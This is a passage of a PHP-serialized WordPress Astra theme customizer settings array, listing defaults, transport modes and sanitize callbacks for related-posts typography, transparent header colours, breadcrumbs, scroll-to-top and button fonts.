stra-settings[related-posts-title-font-size]";a:4:{s:7:"default";a:6:{s:7:"desktop";s:2:"20";s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";s:12:"desktop-unit";s:2:"px";s:11:"tablet-unit";s:2:"px";s:11:"mobile-unit";s:2:"px";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:47:"astra-settings[related-posts-title-font-extras]";a:4:{s:7:"default";a:6:{s:11:"line-height";s:1:"1";s:16:"line-height-unit";s:2:"em";s:14:"letter-spacing";s:0:"";s:19:"letter-spacing-unit";s:2:"px";s:14:"text-transform";s:0:"";s:15:"text-decoration";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:55:"astra-settings[related-posts-section-title-font-family]";a:4:{s:7:"default";s:7:"inherit";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";s:19:"sanitize_text_field";}s:55:"astra-settings[related-posts-section-title-font-weight]";a:4:{s:7:"default";s:7:"inherit";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:20:"sanitize_font_weight";}}s:53:"astra-settings[related-posts-section-title-font-size]";a:4:{s:7:"default";a:6:{s:7:"desktop";s:2:"26";s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";s:12:"desktop-unit";s:2:"px";s:11:"tablet-unit";s:2:"px";s:11:"mobile-unit";s:2:"px";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:55:"astra-settings[related-posts-section-title-font-extras]";a:4:{s:7:"default";a:6:{s:11:"line-height";s:3:"1.6";s:16:"line-height-unit";s:2:"em";s:14:"letter-spacing";s:0:"";s:19:"letter-spacing-unit";s:2:"px";s:14:"text-transform";s:0:"";s:15:"text-decoration";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:46:"astra-settings[related-posts-meta-font-family]";a:4:{s:7:"default";s:7:"inherit";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";s:19:"sanitize_text_field";}s:46:"astra-settings[related-posts-meta-font-weight]";a:4:{s:7:"default";s:7:"inherit";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:20:"sanitize_font_weight";}}s:44:"astra-settings[related-posts-meta-font-size]";a:4:{s:7:"default";a:6:{s:7:"desktop";s:2:"14";s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";s:12:"desktop-unit";s:2:"px";s:11:"tablet-unit";s:2:"px";s:11:"mobile-unit";s:2:"px";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:46:"astra-settings[related-posts-meta-font-extras]";a:4:{s:7:"default";a:6:{s:11:"line-height";s:3:"1.6";s:16:"line-height-unit";s:2:"em";s:14:"letter-spacing";s:0:"";s:19:"letter-spacing-unit";s:2:"px";s:14:"text-transform";s:0:"";s:15:"text-decoration";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:49:"astra-settings[related-posts-content-font-family]";a:4:{s:7:"default";s:7:"inherit";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";s:19:"sanitize_text_field";}s:49:"astra-settings[related-posts-content-font-weight]";a:4:{s:7:"default";s:7:"inherit";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:20:"sanitize_font_weight";}}s:47:"astra-settings[related-posts-content-font-size]";a:4:{s:7:"default";a:6:{s:7:"desktop";s:0:"";s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";s:12:"desktop-unit";s:2:"px";s:11:"tablet-unit";s:2:"px";s:11:"mobile-unit";s:2:"px";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:49:"astra-settings[related-posts-content-font-extras]";a:4:{s:7:"default";a:6:{s:11:"line-height";s:0:"";s:16:"line-height-unit";s:2:"em";s:14:"letter-spacing";s:0:"";s:19:"letter-spacing-unit";s:2:"px";s:14:"text-transform";s:0:"";s:15:"text-decoration";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:54:"astra-settings[transparent-header-bg-color-responsive]";a:4:{s:7:"default";a:3:{s:7:"desktop";s:0:"";s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:62:"astra-settings[transparent-header-color-site-title-responsive]";a:4:{s:7:"default";a:3:{s:7:"desktop";s:0:"";s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:64:"astra-settings[transparent-header-color-h-site-title-responsive]";a:4:{s:7:"default";a:3:{s:7:"desktop";s:0:"";s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:49:"astra-settings[transparent-menu-color-responsive]";a:4:{s:7:"default";a:3:{s:7:"desktop";s:0:"";s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:52:"astra-settings[transparent-menu-bg-color-responsive]";a:4:{s:7:"default";a:3:{s:7:"desktop";s:0:"";s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:51:"astra-settings[transparent-menu-h-color-responsive]";a:4:{s:7:"default";a:3:{s:7:"desktop";s:0:"";s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:52:"astra-settings[transparent-submenu-color-responsive]";a:4:{s:7:"default";a:3:{s:7:"desktop";s:0:"";s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:55:"astra-settings[transparent-submenu-bg-color-responsive]";a:4:{s:7:"default";a:3:{s:7:"desktop";s:0:"";s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:54:"astra-settings[transparent-submenu-h-color-responsive]";a:4:{s:7:"default";a:3:{s:7:"desktop";s:0:"";s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:65:"astra-settings[transparent-content-section-link-color-responsive]";a:4:{s:7:"default";a:3:{s:7:"desktop";s:0:"";s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:67:"astra-settings[transparent-content-section-link-h-color-responsive]";a:4:{s:7:"default";a:3:{s:7:"desktop";s:0:"";s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:41:"astra-settings[transparent-header-enable]";a:4:{s:7:"default";i:0;s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:50:"astra-settings[transparent-header-disable-archive]";a:4:{s:7:"default";i:1;s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:48:"astra-settings[transparent-header-disable-index]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:61:"astra-settings[transparent-header-disable-latest-posts-index]";a:4:{s:7:"default";i:1;s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:47:"astra-settings[transparent-header-disable-page]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:48:"astra-settings[transparent-header-disable-posts]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:45:"astra-settings[transparent-header-on-devices]";a:4:{s:7:"default";s:4:"both";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:42:"astra-settings[different-transparent-logo]";a:4:{s:7:"default";i:0;s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:39:"astra-settings[transparent-header-logo]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";s:11:"esc_url_raw";}s:49:"astra-settings[different-transparent-retina-logo]";a:4:{s:7:"default";i:0;s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:46:"astra-settings[transparent-header-retina-logo]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";s:11:"esc_url_raw";}s:45:"astra-settings[transparent-header-logo-width]";a:4:{s:7:"default";a:3:{s:7:"desktop";i:150;s:6:"tablet";i:120;s:6:"mobile";i:100;}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:43:"astra-settings[transparent-header-main-sep]";a:4:{s:7:"default";i:0;s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:49:"astra-settings[transparent-header-main-sep-color]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:20:"sanitize_alpha_color";}}s:47:"astra-settings[divider-sec-transparent-styling]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:41:"astra-settings[transparent-header-colors]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:46:"astra-settings[transparent-header-colors-menu]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:49:"astra-settings[transparent-header-colors-submenu]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:43:"section-transparent-header-ast-context-tabs";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:61:"astra-settings[transparent-header-social-text-colors-content]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:67:"astra-settings[transparent-header-social-background-colors-content]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:53:"astra-settings[transparent-header-social-icons-color]";a:4:{s:7:"default";a:3:{s:7:"desktop";s:0:"";s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:55:"astra-settings[transparent-header-social-icons-h-color]";a:4:{s:7:"default";a:3:{s:7:"desktop";s:0:"";s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:56:"astra-settings[transparent-header-social-icons-bg-color]";a:4:{s:7:"default";a:3:{s:7:"desktop";s:0:"";s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:58:"astra-settings[transparent-header-social-icons-bg-h-color]";a:4:{s:7:"default";a:3:{s:7:"desktop";s:0:"";s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:52:"astra-settings[transparent-header-html-colors-group]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:50:"astra-settings[transparent-header-html-text-color]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:20:"sanitize_alpha_color";}}s:50:"astra-settings[transparent-header-html-link-color]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:20:"sanitize_alpha_color";}}s:52:"astra-settings[transparent-header-html-link-h-color]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:20:"sanitize_alpha_color";}}s:52:"astra-settings[transparent-header-search-icon-color]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:20:"sanitize_alpha_color";}}s:62:"astra-settings[transparent-header-search-box-background-color]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:20:"sanitize_alpha_color";}}s:53:"astra-settings[transparent-header-buttons-text-group]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:59:"astra-settings[transparent-header-buttons-background-group]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:52:"astra-settings[transparent-header-button-text-color]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:20:"sanitize_alpha_color";}}s:54:"astra-settings[transparent-header-button-text-h-color]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:20:"sanitize_alpha_color";}}s:50:"astra-settings[transparent-header-button-bg-color]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:20:"sanitize_alpha_color";}}s:52:"astra-settings[transparent-header-button-bg-h-color]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:20:"sanitize_alpha_color";}}s:46:"astra-settings[transparent-account-icon-color]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:20:"sanitize_alpha_color";}}s:51:"astra-settings[transparent-account-type-text-color]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:20:"sanitize_alpha_color";}}s:51:"astra-settings[transparent-header-toggle-btn-color]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:54:"astra-settings[transparent-header-toggle-btn-bg-color]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:54:"astra-settings[transparent-header-toggle-border-color]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:35:"astra-settings[breadcrumb-position]";a:4:{s:7:"default";s:4:"none";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:47:"astra-settings[breadcrumb-position-none-notice]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";s:0:"";}s:49:"astra-settings[breadcrumb-disable-layout-divider]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:44:"astra-settings[breadcrumb-disable-home-page]";a:4:{s:7:"default";s:1:"1";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:50:"astra-settings[breadcrumb-disable-blog-posts-page]";a:4:{s:7:"default";s:1:"1";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:41:"astra-settings[breadcrumb-disable-search]";a:4:{s:7:"default";s:1:"1";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:42:"astra-settings[breadcrumb-disable-archive]";a:4:{s:7:"default";s:1:"1";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:46:"astra-settings[breadcrumb-disable-single-page]";a:4:{s:7:"default";s:1:"1";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:46:"astra-settings[breadcrumb-disable-single-post]";a:4:{s:7:"default";s:1:"1";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:43:"astra-settings[breadcrumb-disable-singular]";a:4:{s:7:"default";s:1:"1";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:43:"astra-settings[breadcrumb-disable-404-page]";a:4:{s:7:"default";s:1:"1";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:36:"astra-settings[breadcrumb-alignment]";a:4:{s:7:"default";s:4:"left";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:34:"astra-settings[breadcrumb-spacing]";a:4:{s:7:"default";a:6:{s:7:"desktop";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"tablet";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"mobile";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:12:"desktop-unit";s:2:"px";s:11:"tablet-unit";s:2:"px";s:11:"mobile-unit";s:2:"px";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:27:"sanitize_responsive_spacing";}}s:40:"astra-settings[select-breadcrumb-source]";a:4:{s:7:"default";s:7:"default";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:45:"astra-settings[breadcrumb-separator-selector]";a:4:{s:7:"default";s:5:"\\003E";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:36:"astra-settings[breadcrumb-separator]";a:4:{s:7:"default";s:5:"\\00bb";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:35:"section-breadcrumb-ast-context-tabs";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:48:"astra-settings[breadcrumb-color-section-divider]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:35:"astra-settings[breadcrumb-bg-color]";a:4:{s:7:"default";a:3:{s:7:"desktop";s:0:"";s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:50:"astra-settings[breadcrumb-active-color-responsive]";a:4:{s:7:"default";a:3:{s:7:"desktop";s:0:"";s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:42:"astra-settings[breadcrumb-separator-color]";a:4:{s:7:"default";a:3:{s:7:"desktop";s:0:"";s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:45:"astra-settings[section-breadcrumb-link-color]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:48:"astra-settings[breadcrumb-text-color-responsive]";a:4:{s:7:"default";a:3:{s:7:"desktop";s:0:"";s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:49:"astra-settings[breadcrumb-hover-color-responsive]";a:4:{s:7:"default";a:3:{s:7:"desktop";s:0:"";s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:39:"astra-settings[section-breadcrumb-typo]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:38:"astra-settings[breadcrumb-font-family]";a:4:{s:7:"default";s:7:"inherit";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";s:19:"sanitize_text_field";}s:38:"astra-settings[breadcrumb-font-weight]";a:4:{s:7:"default";s:7:"inherit";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:20:"sanitize_font_weight";}}s:36:"astra-settings[breadcrumb-font-size]";a:4:{s:7:"default";a:6:{s:7:"desktop";s:0:"";s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";s:12:"desktop-unit";s:2:"px";s:11:"tablet-unit";s:2:"px";s:11:"mobile-unit";s:2:"px";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:38:"astra-settings[breadcrumb-font-extras]";a:4:{s:7:"default";a:6:{s:11:"line-height";s:0:"";s:16:"line-height-unit";s:2:"em";s:14:"letter-spacing";s:0:"";s:19:"letter-spacing-unit";s:2:"px";s:14:"text-transform";s:0:"";s:15:"text-decoration";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:36:"astra-settings[scroll-to-top-enable]";a:4:{s:7:"default";b:1;s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:40:"astra-settings[scroll-to-top-on-devices]";a:4:{s:7:"default";s:4:"both";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:43:"astra-settings[scroll-to-top-icon-position]";a:4:{s:7:"default";s:5:"right";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:39:"astra-settings[scroll-to-top-icon-size]";a:4:{s:7:"default";i:15;s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:41:"astra-settings[scroll-on-top-color-group]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:44:"astra-settings[scroll-on-top-bg-color-group]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:48:"astra-settings[scroll-to-top-icon-radius-fields]";a:4:{s:7:"default";a:6:{s:7:"desktop";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"tablet";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"mobile";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:12:"desktop-unit";s:2:"px";s:11:"tablet-unit";s:2:"px";s:11:"mobile-unit";s:2:"px";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:40:"astra-settings[scroll-to-top-icon-color]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:20:"sanitize_alpha_color";}}s:43:"astra-settings[scroll-to-top-icon-bg-color]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:20:"sanitize_alpha_color";}}s:42:"astra-settings[scroll-to-top-icon-h-color]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:20:"sanitize_alpha_color";}}s:45:"astra-settings[scroll-to-top-icon-h-bg-color]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:20:"sanitize_alpha_color";}}s:38:"section-scroll-to-top-ast-context-tabs";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:43:"astra-settings[enable-scroll-to-top-notice]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";s:0:"";}s:34:"astra-settings[heading-base-color]";a:4:{s:7:"default";s:25:"var(--ast-global-color-2)";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:20:"sanitize_alpha_color";}}s:38:"astra-settings[button-text-typography]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:34:"astra-settings[font-family-button]";a:4:{s:7:"default";s:7:"inherit";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";s:19:"sanitize_text_field";}s:34:"astra-settings[font-weight-button]";a:4:{s:7:"default";s:3:"500";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:20:"sanitize_font_weight";}}s:32:"astra-settings[font-size-button]";a:4:{s:7:"default";a:6:{s:7:"desktop";s:2:"16";s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";s:12:"desktop-unit";s:2:"px";s:11:"tablet-unit";s:2:"px";s:11:"mobile-unit";s:2:"px";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:34:"astra-settings[font-extras-button]";a:4:{s:7:"default";a:6:{s:11:"line-height";i:1;s:16:"line-height-unit";s:2:"em";s:14:"letter-spacing";s:0:"";s:19:"letter-spacing-unit";s:2:"px";s:14:"text-transform";s:0:"";s:15:"text-decoration";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:46:"section-header-builder-layout-ast-context-tabs";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:38:"astra-settings[cloned-component-track]";a:4:{s:7:"default";a:12:{s:13:"header-button";i:2;s:13:"footer-button";i:2;s:11:"header-html";i:2;s:11:"footer-html";i:2;s:11:"header-menu";i:2;s:13:"header-widget";i:4;s:13:"footer-widget";i:4;s:19:"header-social-icons";i:1;s:19:"footer-social-icons";i:1;s:14:"header-divider";i:0;s:14:"footer-divider";i:0;s:13:"removed-items";a:0:{}}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:30:"astra-settings[builder-header]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"saniti